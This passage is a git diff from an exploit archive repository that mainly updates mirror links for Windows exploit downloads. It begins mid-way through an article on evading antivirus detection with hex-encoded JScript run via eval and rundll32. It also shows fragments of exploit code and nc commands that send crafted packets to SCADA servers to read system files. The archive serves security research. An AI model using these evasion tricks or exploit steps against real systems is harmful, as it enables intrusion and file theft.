+00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=???? ======================================================================================================================================== Online search shows Win-7 still makes up about 22% of the world's computers, so I ask my friend Security researcher Eduardo Braun Prado (Edu_Braun_0day) @@ -126,7 +126,7 @@ Bypassing "Backdoor:JS/Relvelshe.A" detection. The way we do this is to Hex encode our PoC code new ActiveXObject("WScript.Shell").Run("calc.exe") Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function. -var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; +var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); @@ -172,12 +172,12 @@ rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write(); <component> <script> <![CDATA[ -var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; +var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } - eval(str) + eval(str) ]]> </script> </component> diff --git a/exploits/windows/local/5287.txt b/exploits/windows/local/5287.txt index ec550cc6c..d5f00cefc 100644 --- a/exploits/windows/local/5287.txt +++ b/exploits/windows/local/5287.txt @@ -1,5 +1,5 @@ Microsoft Office Excel Code Execution Exploit (MS08-014) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5287.rar (2008-zha0_ms08_014.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5287.rar (2008-zha0_ms08_014.rar) # milw0rm.com [2008-03-21] \ No newline at end of file diff --git a/exploits/windows/local/5320.txt b/exploits/windows/local/5320.txt index 14c51d7b5..3af9c6d46 100644 --- a/exploits/windows/local/5320.txt +++ b/exploits/windows/local/5320.txt @@ -2,7 +2,7 @@ Runs calc.exe on Office XP SP3 with updates < 03/11/08. Just for fun... -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5320.tgz (2008-ms08-016.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5320.tgz (2008-ms08-016.tgz) Marsupilamipowa@hotmail.fr diff --git a/exploits/windows/local/5442.cpp b/exploits/windows/local/5442.cpp index 39c57661a..46a1974cc 100644 --- a/exploits/windows/local/5442.cpp +++ b/exploits/windows/local/5442.cpp @@ -10,6 +10,6 @@ /// calc will not be run. ///////////////////////////////////////////////////////////// -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5442.zip (2008-exploit_08021.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5442.zip (2008-exploit_08021.zip) // milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/exploits/windows/local/5518.txt b/exploits/windows/local/5518.txt index 572cdf19c..eacbecad9 100644 --- a/exploits/windows/local/5518.txt +++ b/exploits/windows/local/5518.txt @@ -9,6 +9,6 @@ // Ruben Santamarta // www.reversemode.com -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5518.zip (2008-ms08-25-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5518.zip (2008-ms08-25-exploit.zip) # milw0rm.com [2008-04-28] \ No newline at end of file diff --git a/exploits/windows/local/6705.txt b/exploits/windows/local/6705.txt index 271218b24..116b95014 100644 --- a/exploits/windows/local/6705.txt +++ b/exploits/windows/local/6705.txt @@ -29,7 +29,7 @@ Response.Write(output); You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip -backup link: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6705.zip (2008-Churrasco.zip) +backup link: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip (2008-Churrasco.zip) Enjoy. diff --git a/exploits/windows/local/6757.txt b/exploits/windows/local/6757.txt index db343f98c..79bd5a5fe 100644 --- a/exploits/windows/local/6757.txt +++ b/exploits/windows/local/6757.txt @@ -4,7 +4,7 @@ I have just uploaded a k-plugin for Kartoffel, which exploits a flaw patched in the recent MS08-066 bulletin. http://kartoffel.reversemode.com/downloads.php -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6757.zip (2008-afd_plugin.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6757.zip (2008-afd_plugin.zip) For those researchers interesting in digging a little bit more into this diff --git a/exploits/windows/local/6994.txt b/exploits/windows/local/6994.txt index dbf7cb5bf..7d31581da 100644 --- a/exploits/windows/local/6994.txt +++ b/exploits/windows/local/6994.txt @@ -1,6 +1,6 @@ Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Exploit author: Elazar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6994.pdf (2008-APSB08-19.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6994.pdf (2008-APSB08-19.pdf) # milw0rm.com [2008-11-05] \ No newline at end of file diff --git a/exploits/windows/local/7054.txt b/exploits/windows/local/7054.txt index db29d589b..6d729d6b2 100644 --- a/exploits/windows/local/7054.txt +++ b/exploits/windows/local/7054.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0802/AKEProtect_Exp.zip -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7054.zip (2008-AKEProtect_Exp.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7054.zip (2008-AKEProtect_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0802/ntiadv0802.html diff --git a/exploits/windows/local/7516.txt b/exploits/windows/local/7516.txt index 8bd167c83..b2c849379 100644 --- a/exploits/windows/local/7516.txt +++ b/exploits/windows/local/7516.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0807/Epfw_Exp.zip -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7516.zip (2008-Epfw_Exp.zip) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7516.zip (2008-Epfw_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0807/ntiadv0807.html diff --git a/exploits/windows/local/7533.txt b/exploits/windows/local/7533.txt index f7889b9a8..a30d85f22 100644 --- a/exploits/windows/local/7533.txt +++ b/exploits/windows/local/7533.txt @@ -27,7 +27,7 @@ Exploit: http://www.ntinternals.org/ntiadv0810/PowerStrip_Exp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7533.zip (2008-PowerStrip_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7533.zip (2008-PowerStrip_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0810/ntiadv0810.html diff --git a/exploits/windows/local/8175.txt b/exploits/windows/local/8175.txt index acd87c55e..09218dcca 100644 --- a/exploits/windows/local/8175.txt +++ b/exploits/windows/local/8175.txt @@ -30,7 +30,7 @@ Exploit: http://ntinternals.org/ntiadv0809/MksMonEn_Exp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8175.zip (2009-MksMonEn_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8175.zip (2009-MksMonEn_Exp.zip) Advisory: diff --git a/exploits/windows/local/8250.txt b/exploits/windows/local/8250.txt index 0cf36f10d..153e39b62 100644 --- a/exploits/windows/local/8250.txt +++ b/exploits/windows/local/8250.txt @@ -33,7 +33,7 @@ Exploit: http://ntinternals.org/ntiadv0812/ElbyCDIO_Exp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8250.zip (2009-ElbyCDIO_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8250.zip (2009-ElbyCDIO_Exp.zip) Advisory: http://ntinternals.org/ntiadv0812/ntiadv0812.html diff --git a/exploits/windows/local/8280.txt b/exploits/windows/local/8280.txt index c2be1dadf..1a54d7bf2 100644 --- a/exploits/windows/local/8280.txt +++ b/exploits/windows/local/8280.txt @@ -3,6 +3,6 @@ Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500 write up: http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html down: http://blacksecurity.org/download/66/Adobe_JBIG2_Universal_Reader_Acrobat_Exploit -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8280.zip (2009-bl4ck-adobe.zip) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8280.zip (2009-bl4ck-adobe.zip) # milw0rm.com [2009-03-24] \ No newline at end of file diff --git a/exploits/windows/local/8322.txt b/exploits/windows/local/8322.txt index 773ca1efb..44175ee02 100644 --- a/exploits/windows/local/8322.txt +++ b/exploits/windows/local/8322.txt @@ -5,6 +5,6 @@ The vulnerability is caused due to the IOCTL handler of the "tmactmon.sys" driver improperly processing user space parameters. This exploit execute arbitrary code in kernel space via a specially crafted IOCTL. -untested: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8322.zip 2009-trendmicro_local_expl_0day.zip) +untested: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8322.zip 2009-trendmicro_local_expl_0day.zip) # milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/exploits/windows/local/8595.txt b/exploits/windows/local/8595.txt index dd6a45d7c..9f4e8c211 100644 --- a/exploits/windows/local/8595.txt +++ b/exploits/windows/local/8595.txt @@ -21,6 +21,6 @@ Exploit By : www.Abysssec.com note : this exploit is just for educational purpose so shellcode will execute calc if you want other shellcode change shellcode . Exploit Link : http://abysssec.com/Adobe.Collab.getIcon().pdf -Mirror Link : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf) +Mirror Link : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf) # milw0rm.com [2009-05-04] \ No newline at end of file diff --git a/exploits/windows/local/8782.txt b/exploits/windows/local/8782.txt index ef44f2109..654e7589a 100644 --- a/exploits/windows/local/8782.txt +++ b/exploits/windows/local/8782.txt @@ -35,7 +35,7 @@ Exploit: http://ntinternals.org/ntiadv0814/PsDrv_Exp.zip Mirror: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8782.zip (2009-PsDrv_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8782.zip (2009-PsDrv_Exp.zip) Advisory: http://ntinternals.org/ntiadv0814/ntiadv0814.html diff --git a/exploits/windows/local/8875.txt b/exploits/windows/local/8875.txt index 0bc33977f..54c7240f2 100644 --- a/exploits/windows/local/8875.txt +++ b/exploits/windows/local/8875.txt @@ -31,7 +31,7 @@ Exploit: http://ntinternals.org/ntiadv0806/OAmon_Exp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8875.zip (2009-OAmon_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8875.zip (2009-OAmon_Exp.zip) Advisory: http://www.ntinternals.org/ntiadv0806/ntiadv0806.html diff --git a/exploits/windows/local/9301.txt b/exploits/windows/local/9301.txt index 95f61d3fc..337482419 100644 --- a/exploits/windows/local/9301.txt +++ b/exploits/windows/local/9301.txt @@ -28,7 +28,7 @@ Exploit: http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9301.zip (2009-NtUserConsoleControl_Exp.zip) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9301.zip (2009-NtUserConsoleControl_Exp.zip) Description: http://www.ntinternals.org/index.html#09_07_30 diff --git a/exploits/windows/local/9579.py b/exploits/windows/local/9579.py index 1dc855654..7b3b7eff3 100755 --- a/exploits/windows/local/9579.py +++ b/exploits/windows/local/9579.py @@ -13,6 +13,6 @@ # http://www.coromputer.net/CVE-2009-0927_package.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9579.zip (2009-CVE-2009-0927_package.zip) # milw0rm.com [2009-09-03] \ No newline at end of file diff --git a/exploits/windows/local/9895.txt b/exploits/windows/local/9895.txt index 59609af58..ed034dd0a 100644 --- a/exploits/windows/local/9895.txt +++ b/exploits/windows/local/9895.txt @@ -60,5 +60,4 @@ my $junk2 ="\x90" x 100; my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2; open (myfile,">$sploitfile"); print myfile $payload; -close (myfile); - +close (myfile); \ No newline at end of file diff --git a/exploits/windows/remote/10542.py b/exploits/windows/remote/10542.py index fe0aa72f5..d9446c4fd 100755 --- a/exploits/windows/remote/10542.py +++ b/exploits/windows/remote/10542.py @@ -66,4 +66,4 @@ try: print "[-] send() error !" print "[+] Done " except: - print "[x] Socket() error!" + print "[x] Socket() error!" \ No newline at end of file diff --git a/exploits/windows/remote/11173.txt b/exploits/windows/remote/11173.txt index ee729e2dd..e56a3e00f 100644 --- a/exploits/windows/remote/11173.txt +++ b/exploits/windows/remote/11173.txt @@ -6,4 +6,4 @@ # Tested on: xpsp3 ie6 # Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11173.zip (TrendMicro_web_deployment_activex0day.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11173.zip (TrendMicro_web_deployment_activex0day.zip) \ No newline at end of file diff --git a/exploits/windows/remote/11661.txt b/exploits/windows/remote/11661.txt index a91191aab..cd55abce5 100644 --- a/exploits/windows/remote/11661.txt +++ b/exploits/windows/remote/11661.txt @@ -2,4 +2,4 @@ SAP GUI version 7.10 WebViewer3D Active-X JIT-Spray exploit Author: Alexey Sintsov Homepage: http://www.dsec.ru/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11661.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11661.zip \ No newline at end of file diff --git a/exploits/windows/remote/12614.txt b/exploits/windows/remote/12614.txt index eb3014e6a..13a3da50c 100644 --- a/exploits/windows/remote/12614.txt +++ b/exploits/windows/remote/12614.txt @@ -1,5 +1,5 @@ Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12614.zip (safari_parent_close_sintsov.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12614.zip (safari_parent_close_sintsov.zip) Unzip and run START.htm diff --git a/exploits/windows/remote/14179.txt b/exploits/windows/remote/14179.txt index d4f6ee090..963331cd8 100644 --- a/exploits/windows/remote/14179.txt +++ b/exploits/windows/remote/14179.txt @@ -5,4 +5,4 @@ This vulnerability is because of using Alternate Data Stream to open a protected authentication methods can be circumvented. In this technique, we can add a “:$i30:$INDEX_ALLOCATION” to a directory name to bypass the authentication. Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14179.pdf (IIS5.1_Authentication_Bypass.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14179.pdf (IIS5.1_Authentication_Bypass.pdf) \ No newline at end of file diff --git a/exploits/windows/remote/14267.txt b/exploits/windows/remote/14267.txt index ee691e6ce..5e38a9d1f 100644 --- a/exploits/windows/remote/14267.txt +++ b/exploits/windows/remote/14267.txt @@ -87,7 +87,7 @@ possible to disable this feature. http://aluigi.org/testz/onlywebs.zip or -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14267.zip (bfonlywebs.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14267.zip (bfonlywebs.zip) - launch: onlywebs.exe c:\malicious_file.exe - start the server launcher using the following string as sponsor and diff --git a/exploits/windows/remote/14275.txt b/exploits/windows/remote/14275.txt index 37a8a45a8..bd51767be 100644 --- a/exploits/windows/remote/14275.txt +++ b/exploits/windows/remote/14275.txt @@ -8,7 +8,7 @@ This bug utilizes Microsoft Help vuln for RCE. You can test by browsing to http://krash.in/real-exp/exploit.ram -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14275.tar (rp-0day-08-07-2010.tar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14275.tar (rp-0day-08-07-2010.tar) --webDEViL \ No newline at end of file diff --git a/exploits/windows/remote/14385.html b/exploits/windows/remote/14385.html index ab3855452..a42e549d8 100644 --- a/exploits/windows/remote/14385.html +++ b/exploits/windows/remote/14385.html @@ -40,6 +40,4 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';"> -</html> - - +</html> \ No newline at end of file diff --git a/exploits/windows/remote/14447.html b/exploits/windows/remote/14447.html index 6aa0a5e9d..6f53b8051 100644 --- a/exploits/windows/remote/14447.html +++ b/exploits/windows/remote/14447.html @@ -29,5 +29,4 @@ function clickjack_armor(evt) <div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px"> <b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div> -</center></body></html> - +</center></body></html> \ No newline at end of file diff --git a/exploits/windows/remote/14599.txt b/exploits/windows/remote/14599.txt index a33d5914a..d80b81f05 100644 --- a/exploits/windows/remote/14599.txt +++ b/exploits/windows/remote/14599.txt @@ -1,4 +1,4 @@ Tested on my XPSP3+IE7+/nx=AlwaysOn, should work on Windows 7 with the proper return value. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14599.rar (Dr_IDE-AoA-JIT.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14599.rar (Dr_IDE-AoA-JIT.rar) \ No newline at end of file diff --git a/exploits/windows/remote/14674.txt b/exploits/windows/remote/14674.txt index 0a95d46ad..bb4294ce6 100644 --- a/exploits/windows/remote/14674.txt +++ b/exploits/windows/remote/14674.txt @@ -43,4 +43,4 @@ http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html =========================================================================== Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14674.zip (smb2_exploit_release.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14674.zip (smb2_exploit_release.zip) \ No newline at end of file diff --git a/exploits/windows/remote/14853.py b/exploits/windows/remote/14853.py index e52fa8342..c92ea4a20 100755 --- a/exploits/windows/remote/14853.py +++ b/exploits/windows/remote/14853.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14853.tar.gz (moaub1-adobe-newclass.tar.gz) Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability Analysis : http://www.abysssec.com diff --git a/exploits/windows/remote/14886.py b/exploits/windows/remote/14886.py index 4f2e25c8f..d41ba8e29 100755 --- a/exploits/windows/remote/14886.py +++ b/exploits/windows/remote/14886.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14886.zip (Movie-Maker-Remote-Code-Execution-Exploit.zip) Title : Movie Maker Remote Code Execution (MS10-016) Version : moviemk.exe 2.1 (XP SP3) diff --git a/exploits/windows/remote/14895.py b/exploits/windows/remote/14895.py index db20e6443..76de31d74 100755 --- a/exploits/windows/remote/14895.py +++ b/exploits/windows/remote/14895.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14895.zip (moaub-5-exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14895.zip (moaub-5-exploit.zip) ''' diff --git a/exploits/windows/remote/15056.py b/exploits/windows/remote/15056.py index e0cf42ee7..f2d75eeee 100755 --- a/exploits/windows/remote/15056.py +++ b/exploits/windows/remote/15056.py @@ -20,7 +20,7 @@ MOAUB Number : MOAUB_20_BA http://www.exploit-db.com/moaub-20-java-cmm-readmabcurvedata-stack-overflow/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15056.zip (moaub-20-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15056.zip (moaub-20-exploit.zip) ''' import sys diff --git a/exploits/windows/remote/15235.html b/exploits/windows/remote/15235.html index a39eab5ec..20d62ca7e 100644 --- a/exploits/windows/remote/15235.html +++ b/exploits/windows/remote/15235.html @@ -190,4 +190,4 @@ arg5="defaultV" target.InitLicenKeys arg1 ,arg2 ,arg3 ,arg4 ,arg5 </script> -</html> +</html> \ No newline at end of file diff --git a/exploits/windows/remote/15241.txt b/exploits/windows/remote/15241.txt index 500f603ba..b381d12d0 100644 --- a/exploits/windows/remote/15241.txt +++ b/exploits/windows/remote/15241.txt @@ -60,4 +60,4 @@ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS -Code: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15241.zip (iExploit12-DEP.zip) \ No newline at end of file +Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15241.zip (iExploit12-DEP.zip) \ No newline at end of file diff --git a/exploits/windows/remote/15296.txt b/exploits/windows/remote/15296.txt index b16356923..8a79beeb2 100644 --- a/exploits/windows/remote/15296.txt +++ b/exploits/windows/remote/15296.txt @@ -213,7 +213,7 @@ The sample + exploit are tested on patched windows XP service pack 3. here is exploit + binary analysis link: http://abysssec.com/files/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15296.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15296.zip PS 1 : this vulnerability is not patched bug released by ZDI http://www.zerodayinitiative.com/advisories/ZDI-10-162/ PS 2 : itís possible to exploit this vulnerability on modern windows like Vista/7 too and itís up to readers Ö \ No newline at end of file diff --git a/exploits/windows/remote/15869.txt b/exploits/windows/remote/15869.txt index 3f5beabbb..91fc9fda2 100644 --- a/exploits/windows/remote/15869.txt +++ b/exploits/windows/remote/15869.txt @@ -48,4 +48,4 @@ However, here we are. And two of three are unpatched. proof of concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15869.zip (9sg_ca_d2d.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15869.zip (9sg_ca_d2d.zip) \ No newline at end of file diff --git a/exploits/windows/remote/16594.rb b/exploits/windows/remote/16594.rb index 332b19641..1577b66f4 100755 --- a/exploits/windows/remote/16594.rb +++ b/exploits/windows/remote/16594.rb @@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2010-3653'], [ 'OSVDB', '68803'], - [ 'URL', 'https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15296.zip' ], + [ 'URL', 'https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15296.zip' ], ], 'DefaultOptions' => { diff --git a/exploits/windows/remote/17022.txt b/exploits/windows/remote/17022.txt index b12621daa..8cdaa13bd 100644 --- a/exploits/windows/remote/17022.txt +++ b/exploits/windows/remote/17022.txt @@ -6,8 +6,8 @@ http://aluigi.org/adv/factorylink_4-adv.txt http://aluigi.org/adv/factorylink_5-adv.txt http://aluigi.org/adv/factorylink_6-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-1.tar.gz (siemens_factory_link_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-2.tar.gz (siemens_factory_link_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-1.tar.gz (siemens_factory_link_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-2.tar.gz (siemens_factory_link_poc.tar.gz) ####################################################################### @@ -57,7 +57,7 @@ The Code http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-x.zip (factorylink_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-x.zip (factorylink_x.zip) factorylink_x 3 SERVER @@ -84,7 +84,7 @@ The Code http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-x.zip (factorylink_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-x.zip (factorylink_x.zip) for downloading c:\boot.ini factorylink_x 4 SERVER @@ -116,7 +116,7 @@ The Code =========== http://aluigi.org/poc/factorylink_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-3.zip (factorylink_3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-3.zip (factorylink_3.zip) nc SERVER 7579 < factorylink_3.dat @@ -143,7 +143,7 @@ The Code =========== http://aluigi.org/poc/factorylink_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-4.zip (factorylink_4.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-4.zip (factorylink_4.zip) nc SERVER 7579 < factorylink_4.dat @@ -167,7 +167,7 @@ The Code =========== http://aluigi.org/poc/factorylink_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-5.zip (factorylink_5.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-5.zip (factorylink_5.zip) download c:\boot.ini nc SERVER 7579 < factorylink_5.dat @@ -191,7 +191,7 @@ The Code =========== http://aluigi.org/poc/factorylink_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17022-x.zip (factorylink_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17022-x.zip (factorylink_x.zip) factorylink_x 1 SERVER factorylink_x 2 SERVER diff --git a/exploits/windows/remote/17024.txt b/exploits/windows/remote/17024.txt index feb1e4360..618aaa16e 100644 --- a/exploits/windows/remote/17024.txt +++ b/exploits/windows/remote/17024.txt @@ -8,8 +8,8 @@ http://aluigi.org/adv/igss_6-adv.txt http://aluigi.org/adv/igss_7-adv.txt http://aluigi.org/adv/igss_8-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-adv.tar.gz (igss_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-poc.tar.gz (igss_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-adv.tar.gz (igss_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-poc.tar.gz (igss_poc.tar.gz) ####################################################################### @@ -69,7 +69,7 @@ The Code =========== http://aluigi.org/poc/igss_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-1.zip (igss_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-1.zip (igss_1.zip) example for downloading c:\boot.ini: nc SERVER 12401 < igss_1a.dat @@ -113,7 +113,7 @@ The Code =========== http://aluigi.org/poc/igss_2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17024-2.zip (igss_2.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17024-2.zip (igss_2.zip) nc SERVER 12401 < igss_2a.dat nc SERVER 12401 < igss_2b.dat @@ -176,7 +176,7 @@ The Code =========== 